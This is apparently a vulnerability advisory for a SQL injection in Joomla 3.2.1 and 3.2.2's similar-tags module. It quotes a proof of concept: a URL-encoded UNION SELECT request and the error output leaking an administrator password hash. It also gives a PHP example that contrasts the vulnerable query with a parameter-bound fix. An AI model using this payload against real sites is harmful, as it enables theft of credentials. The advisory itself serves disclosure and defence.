Release date:
Updated on:
Affected Systems:
Joomla! Joomla! 3.2.2
Joomla! Joomla! 3.2.1
Description:
--------------------------------------------------------------------------------
Joomla! is an open source Content Management System (CMS).
In Joomla! 3.2.1 and 3.2.2, the ModTagssimilarHelper::getList() method in modules/mod_tags_similar/helper.php does not properly filter user input before using it in a database query. This allows remote attackers to inject or manipulate SQL queries executed against the backend database.
Source: killall-9
Link: http://osvdb.org/show/osvdb/103126
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users bear the risk themselves!
# Exploit Title: Joomla 3.2.1 SQL injection
# Date: 05/02/2014
# Exploit Author: kiall-9@mail.com
# Vendor Homepage: http://www.joomla.org/
# Software Link: http://joomlacode.org/gf/download/frsrelease/19007/134333/Joomla_3.2.1-Stable-Full_Package.zip
# Version: 3.2.1 (default installation with Test sample data)
# Tested on: Virtualbox (debian) + apache
POC =>
http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=\
This request produces the following error:
1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\)' at line 3 SQL=SELECT `t`.`id` FROM `k59cv_tags` AS t INNER JOIN `k59cv_contentitem_tag_map` AS m ON `m`.`tag_id` = `t`.`id` AND `m`.`type_alias` = 'com_weblinks.categories' AND `m`.`content_item_id` IN (\) Array ( [type] => 8 [message] => Undefined offset: 0 [file] => /var/www/Joomla_3.2.1/libraries/joomla/filter/input.php [line] => 203 )
I modified the original error.php file with this code --- <?php print_r(error_get_last()); ?> --- in order to obtain something useful ;-)
Now I can easily exploit this flaw:
http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=0%20%29%20union%20select%20password%20from%20%60k59cv_users%60%20--%20%29
And obtain the hash:
1054 Unknown column '$P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1' in 'where clause' SQL=SELECT `m`.`tag_id`, `m`.`core_content_id`, `m`.`content_item_id`, `m`.`type_alias`, COUNT(`tag_id`) AS `count`, `t`.`access`, `t`.`id`, `ct`.`router`, `cc`.`core_title`, `cc`.`core_alias`, `cc`.`core_catid`, `cc`.`core_language` FROM `k59cv_contentitem_tag_map` AS `m` INNER JOIN `k59cv_tags` AS `t` ON m.tag_id = t.id INNER JOIN `k59cv_ucm_content` AS `cc` ON m.core_content_id = cc.core_content_id INNER JOIN `k59cv_content_types` AS `ct` ON m.type_alias = ct.type_alias WHERE `m`.`tag_id` IN ($P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1) AND t.access IN (1,1) AND (`m`.`content_item_id` <> 0) union select password from `k59cv_users` --) OR `m`.`type_alias` <> 'com_weblinks.categories') AND `cc`.`core_state` = 1 GROUP BY `m`.`core_content_id` ORDER BY `count` DESC LIMIT 0, 5
CheerZ>
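The failing queries above share one shape: an untrusted request parameter pasted straight into an SQL IN (...) list. The following is an added example, not Joomla's own code, that reproduces that pattern against an in-memory SQLite table via PDO and sets the hardened form beside it, where each id is cast to an integer and bound as a query parameter; the table, column and function names are assumed for illustration.

```php
<?php
// Added example, not Joomla's own code. Table, column and function names are
// assumed for illustration. Uses an in-memory SQLite database so it runs offline.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tag_map (tag_id INTEGER, content_item_id INTEGER)');
$db->exec('INSERT INTO tag_map VALUES (1, 10), (2, 10), (3, 11)'); // constructed sample rows

// Vulnerable pattern: the raw request value is interpolated into the IN (...) list,
// which is the shape of the failing query in the advisory.
function similarTagsVulnerable(PDO $db, string $rawId): array
{
    $sql = "SELECT tag_id FROM tag_map WHERE content_item_id IN ($rawId)";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: every id is coerced to an integer and passed as a bound
// parameter, so the SQL text never contains attacker-controlled characters.
function similarTagsSafe(PDO $db, string $rawId): array
{
    $ids = array_map('intval', explode(',', $rawId));
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("SELECT tag_id FROM tag_map WHERE content_item_id IN ($placeholders)");
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$legit   = '10';
$hostile = '0) OR 1=1 --'; // constructed input that closes the IN list early

// Hardened version: intval() reduces the hostile string to 0, which matches no row,
// and a legitimate id list still works.
var_dump(similarTagsSafe($db, $legit));
var_dump(similarTagsSafe($db, $hostile));

// Vulnerable version: the WHERE clause becomes "IN (0) OR 1=1 --)", the trailing
// parenthesis is commented out and the filter no longer restricts anything.
var_dump(similarTagsVulnerable($db, $hostile));
```

The same integer coercion applies to any id-style parameter; for values that are legitimately strings, binding them as parameters (never concatenating) is the equivalent fix.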
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Joomla!
-------
Currently, the vendor has not provided a patch or upgrade. Users of this software are advised to follow the vendor's homepage to obtain the latest version:
http://developer.joomla.org/security/
References:
EDB-31459
URL: http://developer.joomla.org/security/578-20140301-core-sql-injection.html